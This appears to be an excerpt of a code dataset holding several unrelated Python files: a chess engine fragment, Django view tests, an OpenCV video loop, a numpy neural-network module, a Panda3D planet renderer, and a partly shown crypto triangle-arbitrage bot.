or board[start] == '\\n' or board[start] == ' ':\n start = start + 1\n #if there is a piece in this spot on the black team\n elif board[start] == 'p' or board[start] == 'r' or board[start] == 'b' or board[start] == 'k' or board[start] == 'q' or board[start] == 'n':\n #y-coordinate of the space\n temp.append((math.floor(start/10))-2)\n #x-coordinate of the spot\n temp.append((start%10)-1)\n #the letter of the piece\n if board[start] == 'n':\n temp.append('h')\n else:\n temp.append(board[start])\n #add this tuple to the list for team black\n teamBlack.append(temp)\n start = start + 1\n #piece is on the white team\n else:\n #y-coordinate of the piece\n temp.append((math.floor(start/10))-2)\n #x-coordinate of the piece\n temp.append((start%10)-1)\n #have to change the letter of the piece to lower case\n if (board[start] == 'P'):\n temp.append('p')\n elif (board[start] == 'K'):\n temp.append('k')\n elif (board[start] == 'Q'):\n temp.append('q')\n elif (board[start] == 'B'):\n temp.append('b')\n elif (board[start] == 'N'):\n temp.append('h')\n elif (board[start] == 'R'):\n temp.append('r')\n #put this tuple into list for white team\n teamWhite.append(temp)\n start = start + 1\n #count the number of kings on the board\n if board[start] == 'k' or board[start] == 'K':\n kings = kings + 1\n #return the lists and the number of kings\n return teamBlack, teamWhite, kings\n\ndef isCheck(pos):\n\n temp = copy.deepcopy(pos)\n for moves in temp.genMoves():\n temp = temp.move(moves)\n unused1, unused2, kings = searchBoard(temp.board)\n if (kings < 2):\n return False\n temp = copy.deepcopy(pos)\n return True\n\ndef gameOverCheck(pos, tw, tb, redstale, bluestale, k, turn):\n enough = 0\n \"\"\"\n inCheck = False\n isCheckMate = False\n check = []\n temp = copy.deepcopy(pos)\n for moves in temp.rotate().genMoves():\n temp = temp.rotate().move(moves)\n unused1, unused2, kings = searchBoard(temp.board)\n if (kings < 2):\n\n inCheck = True\n temp1 = copy.deepcopy(temp)\n for possMoves in 
temp.genMoves():\n temp1 = temp1.move(possMoves)\n if isCheck(temp1, tw, tb, redstale, bluestale) == False:\n check.append(\"F\")\n else:\n check.append(\"D\")\n temp1 = copy.deepcopy(temp)\n temp = copy.deepcopy(pos)\n if \"F\" not in check and \"D\" in check:\n print(\"checkmate\")\n \"\"\"\n if k < 2:\n if turn == True:\n return 2\n else:\n return 1\n\n if(None not in redstale and None not in bluestale):\n if(redstale[0]==redstale[1] and redstale[0]==redstale[2]):\n if(bluestale[0]==bluestale[1] and bluestale[0]==bluestale[2]):\n return 3\n\n if(len(tb)<3 and len(tw)<3):\n for piece in tb:\n if(piece[2]!='k' and piece[2]!='p' and piece[2]!='b' and piece[2]!='h'):\n enough = 1\n for piece in tw:\n if(piece[2]!='K' and piece[2]!='P' and piece[2]!='B' and piece[2]!='H'):\n enough = 1\n if(enough == 0):\n return 3\n '''\n temp = copy.deepcopy(pos)\n if isCheck(temp.rotate()) == True:\n print(\"not check\")\n temp2 = copy.deepcopy(pos)\n temp3 = copy.deepcopy(pos)\n for moves in temp2.genMoves():\n temp3.move(moves)\n if isCheck(temp3.rotate()) == True:\n print(\"not stale\")\n return 0\n temp3.copy.deepcopy(pos)\n '''\n return 0\n\n\ndef main():\n\n\n #run indefinitely\n while True:\n #initial board\n pos = Position(initial, 0, (True,True), (True,True), 0, 0)\n tb, tw, k = searchBoard(pos.board)\n\n #write the json file\n with open('board.json', 'w') as file:\n json.dump({'black': tb, 'white': tw, 'over':0}, file, sort_keys=True, indent=4, separators=(',', ': '))\n\n red = []\n blue = []\n redstale = []\n bluestale = []\n #fill the last three moves with none\n for x in range(0,3):\n redstale.append(None)\n bluestale.append(None)\n\n\n\n\n #run until a team wins\n while True:\n # We add some spaces to the board before we print it.\n # That makes it more readable and pleasing.\n ' '.join(pos.board)\n\n # We query the user until she enters a legal move.\n move = None\n while move not in pos.genMoves():\n crdn = input()\n move = parse(crdn[0:2]), parse(crdn[2:4])\n\n 
#make the move\n pos = pos.move(move)\n tb, tw, k = searchBoard(pos.rotate().board)\n red.append(move)\n if(len(red) != 2):\n redstale.append(red)\n redstale = redstale[1:]\n red = []\n ov = gameOverCheck(pos, tw, tb, redstale, bluestale, k, True)\n if ov != 0:\n break\n\n #write json of new board\n with open('board.json', 'w') as file:\n json.dump({'black': tb, 'white': tw, 'over':ov}, file, sort_keys=True, indent=4, separators=(',', ': '))\n\n # After our move we rotate the board and print it again.\n # This allows us to see the effect of our move.\n ' '.join(pos.rotate().board)\n\n\n\n\n #Other team move\n move = None\n while move not in pos.genMoves():\n crdn = input()\n ab = moveSwitch(crdn[0:2])\n cd = moveSwitch(crdn[2:4])\n full = ab+cd\n move = parse(full[0:2]), parse(full[2:4])\n\n #moke move\n pos = pos.move(move)\n tb, tw, k = searchBoard(pos.board)\n blue.append(move)\n if(len(blue) != 2):\n bluestale.append(blue)\n bluestale = bluestale[1:]\n blue = []\n ov = gameOverCheck(pos, tw, tb, redstale, bluestale, k, False)\n if ov != 0:\n break\n\n #write new json\n with open('board.json', 'w') as file:\n json.dump({'black': tb, 'white': tw, 'over':ov}, file, sort_keys=True, indent=4, separators=(',', ': '))\n\n\nif __name__ == '__main__':\n main()","sub_path":"chessengine.py","file_name":"chessengine.py","file_ext":"py","file_size_in_byte":17669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"189003986","text":"#libs\nfrom django.test import TestCase, Client\n\n#local\nfrom albums.models import Category, Artist\n\n\nclass ViewTest(TestCase):\n def setUp(self):\n self.client_stub = Client()\n self.category = Category(name='Test Category', slug='test-category')\n self.category.save()\n self.artist = Artist(first_name='TestFirst', last_name='TestLast',\n start_date='2013-02-11', user_id=1)\n self.artist.save()\n\n def test_view_home_route(self):\n response = self.client_stub.get('/albums/')\n 
self.assertEquals(response.status_code, 200)\n\n def test_view_category_route(self):\n response = self.client_stub.get('/albums/category/')\n self.assertEquals(response.status_code, 200)\n\n def test_add_category_route(self):\n response = self.client_stub.get('/albums/add_category/')\n self.assertEquals(response.status_code, 200)\n\n def test_create_category_successful_route(self):\n response = self.client_stub.post('/albums/add_category/',\n data={'name': 'TestCategory',\n 'slug': 'test-category',\n 'content': 'test content'})\n self.assertEqual(response.status_code, 302)\n\n def test_create_artist_successful_route(self):\n response = self.client_stub.post('add_artist',\n data={'user_id': '1',\n 'first_name': 'TestFirst',\n 'last_name': 'TestLast',\n 'start_date': '1970-02-11',\n 'end_date': '2013-01-02',\n 'born': '1945-02-02',\n 'known_as': 'Test',\n 'category': 'Blues',\n 'tags': 'test'})\n self.assertEqual(response.status_code, 302)\n\n def tearDown(self):\n self.category.delete()\n self.artist.delete()\n","sub_path":"albums/test/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"438011672","text":"import numpy as np\nimport cv2\nimport sys\nimport argparse\nimport time\n#from matplotlib import pyplot as plt\n\ncv2.namedWindow('dst', cv2.WINDOW_NORMAL)\n\n\n#from engines.simple import processor\n#from engines.rectangular import processor\nfrom engines.scipio import processor\n\ndef getArgs():\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-v\", \"--video\", required=True,\thelp=\"path to input video file\")\n return vars(ap.parse_args())\n\ndef show(image, dst='dst'):\n cv2.imshow(dst, image)\n\nargs = getArgs()\n\n#utils.create_hsv_slider()\n#utils.create_area_slider()\n\n#detectorm = Detector(args)\n\ncap = cv2.VideoCapture(args['video'])\nframe = None\npause = False\n\ncv2.namedWindow('original', 
cv2.WINDOW_NORMAL)\n\n#figure = plt.figure()\n#img = figure.add_subplot(121)\n#plt.show()\n\ni=0\nwhile(cap.isOpened()):\n i+=1\n key = cv2.waitKey(1)\n\n if key==ord('q'):\n break\n\n if key==ord(' '):\n pause = not pause\n\n if not pause:\n ret, frame = cap.read()\n\n if frame is None:\n break\n\n show(frame, 'original')\n\n start = time.time()\n image = processor(frame)\n elapsed = time.time() - start\n if i%10==0:\n print(\"%d ms to finish\" % int(elapsed*1000))\n\n show(image)\n #img.imshow(image)\n\n time.sleep(0.01)\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"experiments/process-video.py","file_name":"process-video.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"545174227","text":"import numpy as np\nimport sys\nfrom functions import activation, activation_derivative, softmax\n\n\ndef forward(conf, X_batch, params, is_training):\n \"\"\"\n Forward propagation through fully connected network.\n\n X_batch:\n (batch_size, channels * height * width)\n \"\"\"\n n = conf[\"layer_dimensions\"]\n L = len(n) - 1\n\n # Saves the input\n A = X_batch\n features = {}\n features[\"A_0\"] = A\n\n # Loop over each layer in network\n for l in range(1, L + 1):\n A_prev = A.copy()\n Z = np.dot(params[\"W_\" + str(l)].T, A_prev) + params[\"b_\" + str(l)]\n\n # Calculates activation (Relu, or softmax for output)\n if l < L:\n A = activation(Z.copy(), \"relu\")\n else:\n A = softmax(Z.copy())\n if is_training:\n # Save activations if training\n features[\"Z_\" + str(l)] = Z.copy()\n features[\"A_\" + str(l)] = A.copy()\n\n # Y_proposed is the probabilities returned by passing\n # activations through the softmax function.\n Y_proposed = A\n return Y_proposed, features\n\n\ndef backward(conf, Y_proposed, Y_reference, params, features):\n \"\"\"\n Backpropagation through the fully connected network.\n \"\"\"\n n_y, m = Y_reference.shape\n n = 
conf[\"layer_dimensions\"]\n L = len(n) - 1\n grad_params = {}\n\n # Output layer gradient. Gradient of loss using softmax.\n dZ = Y_proposed - Y_reference\n\n # Loop backwards through layers\n for l in reversed(range(1, L + 1)):\n # Gradient of weight l\n grad_params[\"grad_W_\" + str(l)] = np.dot(features[\"A_\" + str(l - 1)], dZ.T) / m #\n # Gradient of bias l\n grad_params[\"grad_b_\" + str(l)] = np.sum(dZ, axis=1, keepdims=True) / m\n\n # Calculate new output gradient\n if l > 1:\n gZ = activation_derivative(features[\"Z_\" + str(l - 1)], \"relu\")\n wdZ = np.sum((params[\"W_\" + str(l)].T)[:, :, np.newaxis] * dZ[:, np.newaxis, :], axis=0)\n dZ = gZ * wdZ\n return grad_params, dZ\n","sub_path":"project3/src/dnn.py","file_name":"dnn.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"206953071","text":"from direct.showbase.ShowBase import ShowBase\nfrom direct.actor.Actor import Actor\nfrom direct.filter.CommonFilters import CommonFilters\nfrom panda3d.core import PerlinNoise2, PNMImage, PointLight, Shader, Texture, Vec3, Vec4, loadPrcFileData\n\n# atashi iya ne\nloadPrcFileData('', \"\"\"\n frame-rate-meter-side-margin 0.1\n show-frame-rate-meter 1\n framebuffer-multisample 1\n multisamples 2\n fullscreen 1\n win-size 1920 1080\n\"\"\")\n\nfrom pandac.PandaModules import *\nfrom direct.task import Task\nimport numpy as np\nfrom projec import convert\n\nclass mesh:\n def __init__(self, path):\n self.nodePath = self.mesh()\n self.nodePath.reparentTo(path)\n \n def mesh(self):\n self.format = GeomVertexFormat.getV3n3c4t2()\n self.data = GeomVertexData('quadFace', self.format, Geom.UHStatic)\n for attr in ['vertex', 'normal', 'color', 'texcoord']:\n setattr(self, attr, GeomVertexWriter(self.data, attr))\n self.triangles = GeomTriangles(Geom.UHStatic)\n self.create()\n \n mesh = Geom(self.data)\n mesh.addPrimitive(self.triangles)\n mnode = GeomNode('quadface')\n 
mnode.addGeom(mesh)\n \n return base.render.attachNewNode(mnode)\n \n def addvertex(self, pos, nor, tex):\n self.vertex.addData3f(*pos)\n self.normal.addData3f(*nor)\n self.texcoord.addData2f(*tex)\n \n def addtriang(self, i, j, l):\n self.triangles.addVertices(i, j, l)\n\n def create(self):\n raise NotImplementedError()\n\nclass cube(mesh):\n def create(self):\n for x in [-1, 1]:\n for y in [-1, 1]:\n for z in [-1, 1]:\n r = (x*x + y*y + z*z)**0.5\n self.addvertex((x, y, z), (x/r, y/r, z/r), (0, 0))\n \n def do(a, b, c):\n self.addtriang(a, a^b, a^c)\n self.addtriang(a^c, a^b, a^b^c)\n \n # sides\n do(0, 4, 1)\n do(0, 2, 4)\n do(2, 1, 4)\n do(1, 4, 2)\n #top\n do(4, 2, 1)\n #bottom\n do(0, 1, 2)\n \n def texture(self, te):\n self.nodePath.setTexture(te)\nclass roundedplate(mesh):\n def create(self):\n POINTS = 33\n points = np.linspace(-1, 1, POINTS)\n for i in range(POINTS):\n for j in range(POINTS):\n x = points[j]\n y = points[i]\n u = (x + 1) / 2\n v = (y + 1) / 2\n #u = u * 0.999 + 0.0005\n #v = v * 0.999 + 0.0005\n X, Y, Z = convert.pt_to_sphere(x, y, 1)#pt2sphere(x, y)\n self.addvertex( (X, Y, Z), (X, Y, Z), (u, v) )\n \n def what(i, j):\n return POINTS * i + j\n \n for i in range(POINTS - 1):\n for j in range(POINTS - 1):\n self.addtriang(\n what(i, j),\n what(i, j+1),\n what(i+1, j)\n )\n self.addtriang(\n what(i, j+1),\n what(i+1, j+1),\n what(i+1, j)\n )\n \n sides = {\n \"top\": (0, 0, 0),\n \"bottom\": (0, 0, 180),\n \"front\": (0, 90, 180),\n \"back\": (0, 90, 0),\n \"left\": (0, 90, -90),\n \"right\": (0, 90, 90)\n }\n \n def side(self, which):\n self.nodePath.setHpr( *roundedplate.sides[which] )\n return self\n \n def texture(self, te):\n self.nodePath.setTexture(te, 3)\n return self\n \n def overlay(self, ts, te):\n self.nodePath.setTexture(ts, te)\n return self\n\n def clear(self, ts):\n self.nodePath.clearTexture(ts)\ndef maketexture(fn):\n te = loader.loadTexture(fn)\n te.setMinfilter(SamplerState.FT_linear_mipmap_linear)\n 
te.setAnisotropicDegree(16)\n te.setWrapU(Texture.WM_clamp)\n te.setWrapV(Texture.WM_clamp)\n return te\n \nclass planet:\n def __init__(self, nodepath):\n self.init()\n self.nodePath.reparentTo(nodepath) # iya\n \n def init(self):\n planet = NodePath('planet')\n #shaders = Shader.load(Shader.SLGLSL, 'vert.glsl', 'frag.glsl')\n #planet.setShader(shaders)\n \n material = Material()\n #material.setShininess(0.1)\n material.setShininess(1)\n material.setSpecular((0.2, 0.2, 0.2, 1))\n \n self.ov = TextureStage('overlay')\n self.ov.setMode(TextureStage.MDecal)\n self.textures = []\n self.overlays = []\n \n self.cube = []\n for (j, side) in enumerate(roundedplate.sides.keys()):\n self.textures.append( maketexture(\"satellite-%d.png\" % j) )\n #self.textures.append( maketexture(\"black.png\") )\n self.overlays.append( maketexture(\"satellite-goes-%d.png\" % j) )\n #te = maketexture(\"satellite-%d.png\" % j)\n #t2 = maketexture(\"satellite-goes-%d.png\" % j)\n self.cube.append(\n roundedplate(planet)\n .side(side)\n \n )\n \n self.texture()\n \n planet.setScale(0.9) #planet.setScale(0.95) #planet.setScale(1/2) # iya\n planet.setMaterial(material)\n self.nodePath = planet\n \n def texture(self):\n for c, t, t2 in zip(self.cube, self.textures, self.overlays):\n (c.texture(t)\n .overlay(self.ov, t2)\n \n )\n \n #for _ in self.cube:\n # _.texture(self.te).overlay(self.ov, self.t2)\n \n def overlayswitch(self, which):\n if which:\n self.texture()\n else:\n for c in self.cube:\n c.clear(self.ov)\n \nclass plight:\n def __init__(self):\n spot = Spotlight('spot')\n lens = PerspectiveLens()\n spot.setLens(lens)\n spot.setColor((1, 1, 1, 1))\n \n ambi = AmbientLight('ambient')\n ambi.setColor((0.4, 0.4, 0.4, 1))\n \n spotNP = render.attachNewNode(spot)\n spotNP.setPos(-2, -4, 2)\n #spotNP.setPos(-1, -2, 0)\n spotNP.lookAt(0, 0, 0)\n \n ambiNP = render.attachNewNode(ambi)\n \n self.spotNP = spotNP\n self.ambiNP = ambiNP\n self.lights = [self.spotNP, self.ambiNP]\n \n def on(self, 
bool=True):\n f = render.setLight if bool else render.clearLight\n for l in self.lights:\n f(l)\n \nclass Planet(ShowBase):\n def __init__(self):\n ShowBase.__init__(self)\n \n base.setBackgroundColor(0, 0, 0)\n \n render.setShaderAuto()\n\n render.setAntialias(AntialiasAttrib.MMultisample)\n base.disableMouse()\n base.camLens.setNearFar(0.1, 20)\n \n p = planet(base.render)\n \n \"\"\"\n cuby = cube(base.render)\n material = Material()\n material.setShininess(1)\n material.setSpecular((1, 0.2, 0.2, 1))\n cuby.nodePath.setScale(1/10)\n cuby.nodePath.setPos(0, -1, 0)\n cuby.nodePath.setMaterial(material)\n cuby.nodePath.reparentTo(p.nodePath)\n \"\"\"\n \n light = plight()\n light.on()\n \n self.taskMgr.add(self.rotator, \"rotateplanet\")\n\n self.taskMgr.add(self.cameracontrol, \"cameramove\")\n self.pausecontrol = False\n self.overlaycontrol = True\n \n #def out():\n # self.pausecontrol = not self.pausecontrol\n # base.oobe()\n \n #self.accept(\"o\", out)\n \n def tsswitch():\n print(\"switching\")\n self.overlaycontrol = not self.overlaycontrol\n p.overlayswitch(self.overlaycontrol)\n \n self.accept(\"o\", tsswitch)\n \n def rotator(self, task):\n planet = render.find(\"planet\")\n planet.setHpr(task.time*3, 0, 0)\n return Task.cont\n\n def cameracontrol(self, task):\n if self.pausecontrol:\n return\n \n def mouse():\n props = base.win.getProperties()\n w, h = props.getXSize(), props.getYSize()\n r = w / h\n if base.mouseWatcherNode.hasMouse():\n x, y = base.mouseWatcherNode.getMouseX(), base.mouseWatcherNode.getMouseY()\n return x * r, y, r\n # rar\n else:\n return 0, 0, r\n \n planet = render.find(\"planet\")\n x, y, r = mouse()\n # atashi iya ne\n offset = LVector3(x, -6, y)\n ul, ur, ll, lr = (\n LPoint3(-r, 0, 1) - offset,\n LPoint3(r, 0, 1) - offset,\n LPoint3(-r, 0, -1) - offset,\n LPoint3(r, 0, -1) - offset\n )\n base.camLens.setFrustumFromCorners(ul, ur, ll, lr, Lens.FC_off_axis | Lens.FC_aspect_ratio | Lens.FC_shear)\n base.cam.setPos(offset)\n return 
Task.cont\n \napp = Planet()\napp.run()\n","sub_path":"pics/sphere.py","file_name":"sphere.py","file_ext":"py","file_size_in_byte":8914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"37143219","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport logging\n\nimport time\n\nfrom quant import config\nfrom quant.brokers import broker_factory\nfrom .basicbot import BasicBot\n\n\nclass TriangleArbitrage(BasicBot):\n \"\"\"\n bitfinex和liqui的三角套利\n python -m quant.cli -mBitfinex_BCH_USD,Liqui_BCC_BTC,Bitfinex_BTC_USD t-watch-bitfinex-liqui-usd-bch-btc -v\n 待调整参数:\n profit>10 ? 大于多少合适\n \"\"\"\n\n def __init__(self, base_pair, pair1, pair2, monitor_only=False):\n super(TriangleArbitrage, self).__init__()\n\n self.base_pair = base_pair\n self.pair_1 = pair1\n self.pair_2 = pair2\n self.monitor_only = monitor_only\n\n self.brokers = broker_factory.create_brokers([self.base_pair, self.pair_1, self.pair_2])\n\n self.last_trade = 0\n self.min_amount_bch = 0.001\n self.min_amount_btc = 0.005\n # 保留的小树位精度\n self.precision = 2\n # 赢利触发点\n self.profit_trigger = 1.5\n self.skip = False\n\n # 分别的手续费\n self.fee_base = 0.002\n self.fee_pair1 = 0.0025\n self.fee_pair2 = 0.002\n\n def is_depths_available(self, depths):\n return self.base_pair in depths and self.pair_1 in depths and self.pair_2 in depths\n\n def tick(self, depths):\n self.update_balance()\n if not self.is_depths_available(depths):\n # logging.debug(\"depths is not available\")\n return\n self.skip = False\n self.forward(depths)\n self.reverse(depths)\n\n def forward(self, depths):\n logging.info(\"==============正循环, base买 合成卖==============\")\n base_pair_ask_amount = depths[self.base_pair]['asks'][0]['amount']\n base_pair_ask_price = depths[self.base_pair]['asks'][0]['price']\n base_pair_ask_price_real = base_pair_ask_price * (1 + self.fee_base)\n\n logging.info(\"forward======>base_pair: %s ask_price:%s\" % (self.base_pair, base_pair_ask_price))\n\n 
\"\"\"所有的real都是带手续费的价格\"\"\"\n pair1_bid_amount = depths[self.pair_1]['bids'][0]['amount']\n pair1_bid_price = depths[self.pair_1]['bids'][0]['price']\n pair1_bid_price_real = pair1_bid_price * (1 - self.fee_pair1)\n\n pair2_bid_amount = depths[self.pair_2]['bids'][0]['amount']\n pair2_bid_price = depths[self.pair_2]['bids'][0]['price']\n pair2_bid_price_real = pair2_bid_price * (1 - self.fee_pair2)\n\n \"\"\"合成后的价格对标bch_usd, 以目前的bfx的价格设置小数位保留2位比较合适\"\"\"\n synthetic_bid_price = round(pair1_bid_price * pair2_bid_price, self.precision)\n synthetic_bid_price_real = round(pair1_bid_price_real * pair2_bid_price_real, self.precision)\n \"\"\"价差, diff=卖-买, 对标的是usd, 小数位保留2\"\"\"\n p_diff = synthetic_bid_price - base_pair_ask_price\n\n logging.info(\"forward======>%s bid_price: %s, %s bid_price: %s\" %\n (self.pair_1, pair1_bid_price, self.pair_2, pair2_bid_price))\n logging.info(\"forward======>synthetic_bid_price: %s, p_diff: %s\" % (synthetic_bid_price, p_diff))\n\n if pair1_bid_price == 0:\n return\n\n pair_2to1_bch_amount = round(pair2_bid_amount / pair1_bid_price, 8)\n\n \"\"\"市场限制base最多能买多少个bch, pair1 最多能卖多少个bch, 并且在上线和下线范围内[5, 0.05]\"\"\"\n \"\"\"吃单50%, 两个目的:1,增加成交几率; 2,在🈷️余额充足的前提下,委单的手续费部分可能不能成交(极端)\"\"\"\n max_trade_amount = config.bch_max_tx_volume\n min_trade_amount = config.bch_min_tx_volume\n hedge_bch_amount_market = min(base_pair_ask_amount, pair1_bid_amount)\n hedge_bch_amount_market = min(hedge_bch_amount_market, pair_2to1_bch_amount)\n hedge_bch_amount_market = min(max_trade_amount, hedge_bch_amount_market)\n hedge_bch_amount_market = hedge_bch_amount_market / 2\n hedge_btc_amount_market = round(hedge_bch_amount_market * pair1_bid_price, 8)\n\n if self.monitor_only:\n hedge_bch_amount = hedge_btc_amount_market\n hedge_btc_amount = hedge_bch_amount * pair1_bid_price\n if hedge_bch_amount < self.min_amount_bch:\n \"\"\"bitfinex限制bch_usd最小可交易的bch order size为0.001\"\"\"\n logging.info(\"forward======>hedge_bch_amount is too small! 
%s\" % hedge_bch_amount)\n return\n\n if hedge_btc_amount < self.min_amount_btc:\n \"\"\"bitfinex限制btc_usd最小可交易amount为0.005, liqui限制单次交易btc的amount为0.0001, 所以这里取0.005\"\"\"\n logging.info(\"forward======>hedge_btc_amount is too small! %s\" % hedge_btc_amount)\n return\n else:\n \"\"\"余额限制base最多能买多少个bch, pair1 最多能卖多少个bch, 要带上手续费\"\"\"\n hedge_bch_amount_balance = round(min(self.brokers[self.pair_1].bch_available,\n self.brokers[self.base_pair].usd_available / base_pair_ask_price_real),\n 8)\n hedge_btc_amount_balance = round(min(self.brokers[self.pair_2].btc_available,\n self.brokers[self.pair_1].bch_available * pair1_bid_price_real), 8)\n\n \"\"\"取市场和余额共同限制的amount\"\"\"\n hedge_bch_amount = min(hedge_bch_amount_market, hedge_bch_amount_balance, min_trade_amount)\n hedge_btc_amount = hedge_bch_amount * pair1_bid_price\n\n logging.info(\"forward======>balance allow bch: %s and btc: %s, market allow bch: %s and btc: %s \" %\n (hedge_bch_amount_balance, hedge_btc_amount_balance,\n hedge_bch_amount_market, hedge_btc_amount_market))\n\n if hedge_bch_amount < self.min_amount_bch:\n \"\"\"bitfinex限制bch_usd最小可交易的bch order size为0.001\"\"\"\n logging.info(\"forward======>hedge_bch_amount is too small! %s\" % hedge_bch_amount)\n return\n\n if hedge_btc_amount < self.min_amount_btc or hedge_btc_amount > hedge_btc_amount_balance:\n \"\"\"bitfinex限制btc_usd最小可交易amount为0.005, liqui限制单次交易btc的amount为0.0001, 所以这里取0.005\"\"\"\n \"\"\"btc余额不足也不行\"\"\"\n logging.info(\"forward======>hedge_btc_amount is too small! 
%s\" % hedge_btc_amount)\n return\n\n \"\"\"\n 计算的关键点在于bcc和btc的买卖amount除去手续费后是相同的,也就是进行一个循环交易后bcc和btc的总量是不变的, 变的是usd\n profit=去除交易手续费后交易hedge_bch_amount的赢利\n \"\"\"\n t_price = round(synthetic_bid_price_real - base_pair_ask_price_real, self.precision)\n profit = round(t_price * hedge_bch_amount, self.precision)\n logging.debug(\"forward======>t_price: %s, profit: %s\" % (t_price, profit))\n if profit > 0:\n logging.info(\"forward======>find profit!!!: profit:%s, bch amount: %s and btc amount: %s, t_price: %s\" %\n (profit, hedge_bch_amount, hedge_btc_amount, t_price))\n if profit < self.profit_trigger:\n logging.warn(\"forward======>profit should >= %s usd\" % self.profit_trigger)\n return\n\n current_time = time.time()\n if current_time - self.last_trade < 5:\n logging.warn(\"forward======>Can't automate this trade, last trade \" +\n \"occured %.2f seconds ago\" %\n (current_time - self.last_trade))\n return\n\n if not self.monitor_only:\n logging.info(\"forward======>Ready to trade\")\n amount_base = hedge_bch_amount * (1 + self.fee_base)\n amount_pair2 = hedge_bch_amount * pair1_bid_price * (1 - self.fee_pair1)\n self.new_order(market=self.base_pair, order_type='buy', amount=amount_base,\n price=base_pair_ask_price)\n self.new_order(market=self.pair_1, order_type='sell',\n amount=hedge_bch_amount, price=pair1_bid_price)\n self.new_order(market=self.pair_2, order_type='sell', amount=amount_pair2,\n price=pair2_bid_price)\n self.skip = True\n\n self.last_trade = time.time()\n\n def reverse(self, depths):\n if self.skip and (not self.monitor_only):\n return\n logging.info(\"==============逆循环, base卖 合成买==============\")\n base_pair_bid_amount = depths[self.base_pair]['bids'][0]['amount']\n base_pair_bid_price = depths[self.base_pair]['bids'][0]['price']\n base_pair_bid_price_real = base_pair_bid_price * (1 - self.fee_base)\n\n logging.info(\"reverse======>base_pair: %s bid_price:%s\" % (self.base_pair, base_pair_bid_price))\n\n pair1_ask_amount = 
depths[self.pair_1]['asks'][0]['amount']\n pair1_ask_price = depths[self.pair_1]['asks'][0]['price']\n pair1_ask_price_real = pair1_ask_price * (1 + self.fee_pair1)\n\n pair2_ask_amount = depths[self.pair_2]['asks'][0]['amount']\n pair2_ask_price = depths[self.pair_2]['asks'][0]['price']\n pair2_ask_price_real = pair2_ask_price * (1 + self.fee_pair2)\n\n synthetic_ask_price = round(pair1_ask_price * pair2_ask_price, self.precision)\n synthetic_ask_price_real = round(pair1_ask_price_real * pair2_ask_price_real, self.precision)\n p_diff = base_pair_bid_price - synthetic_ask_price\n\n logging.info(\"reverse======>%s ask_price: %s, %s ask_price: %s\" %\n (self.pair_1, pair1_ask_price, self.pair_2, pair2_ask_price))\n logging.info(\"reverse======>synthetic_ask_price: %s, p_diff: %s\" % (synthetic_ask_price, p_diff))\n if pair1_ask_price == 0 or pair2_ask_price == 0:\n return\n\n pair_2to1_bch_amount = round(pair2_ask_amount / pair1_ask_price, 8)\n\n \"\"\"市场限制base最多能卖多少个bch, pair1 最多能买多少个bch, 并且在上线和下线范围内[5, 0.05]\"\"\"\n \"\"\"吃单50%, 两个目的:1,增加成交几率; 2,在🈷️余额充足的前提下,委单的手续费部分可能不能成交(极端)\"\"\"\n max_trade_amount = config.bch_max_tx_volume\n min_trade_amount = config.bch_min_tx_volume\n hedge_bch_amount_market = min(base_pair_bid_amount, pair1_ask_amount)\n hedge_bch_amount_market = min(hedge_bch_amount_market, pair_2to1_bch_amount)\n hedge_bch_amount_market = min(max_trade_amount, hedge_bch_amount_market)\n hedge_bch_amount_market = hedge_bch_amount_market / 2\n hedge_btc_amount_market = round(hedge_bch_amount_market * pair1_ask_price, 8)\n\n if self.monitor_only:\n hedge_bch_amount = hedge_bch_amount_market\n hedge_btc_amount = hedge_bch_amount * pair1_ask_price\n if hedge_bch_amount < self.min_amount_bch:\n \"\"\"bfx限制bch最小订单数量为0.001\"\"\"\n logging.info(\"reverse======>hedge_bch_amount is too small! 
%s\" % hedge_bch_amount)\n return\n\n if hedge_btc_amount < self.min_amount_btc:\n \"\"\"lq限制最小btc的total为0.0001, bfx的bch_usd交易订单限制amount为0.005\"\"\"\n logging.info(\"reverse======>hedge_btc_amount is too small! %s\" % hedge_btc_amount)\n return\n else:\n \"\"\"余额限制base最多能卖多少个bch, pair1 最多能买多少个bch, 要带上手续费\"\"\"\n hedge_bch_amount_balance = min(self.brokers[self.base_pair].bch_available,\n self.brokers[self.pair_1].btc_available * pair1_ask_price_real)\n hedge_btc_amount_balance = min(self.brokers[self.pair_2].usd_available * pair2_ask_price_real,\n self.brokers[self.pair_1].btc_available)\n\n hedge_bch_amount = min(hedge_bch_amount_market, hedge_bch_amount_balance, min_trade_amount)\n hedge_btc_amount = hedge_bch_amount * pair1_ask_price\n\n logging.info(\"reverse======>balance allow bch: %s and btc: %s, market allow bch: %s and btc: %s \" %\n (hedge_bch_amount_balance, hedge_btc_amount_balance,\n hedge_bch_amount_market, hedge_btc_amount_market))\n\n if hedge_bch_amount < self.min_amount_bch:\n \"\"\"bfx限制bch最小订单数量为0.001\"\"\"\n logging.info(\"reverse======>hedge_bch_amount is too small! %s\" % hedge_bch_amount)\n return\n\n if hedge_btc_amount < self.min_amount_btc or hedge_btc_amount > hedge_btc_amount_balance:\n \"\"\"lq限制最小btc的total为0.0001, bfx的bch_usd交易订单限制amount为0.005\"\"\"\n \"\"\"并且不能大于余额的限制\"\"\"\n logging.info(\"reverse======>hedge_btc_amount is too small! 
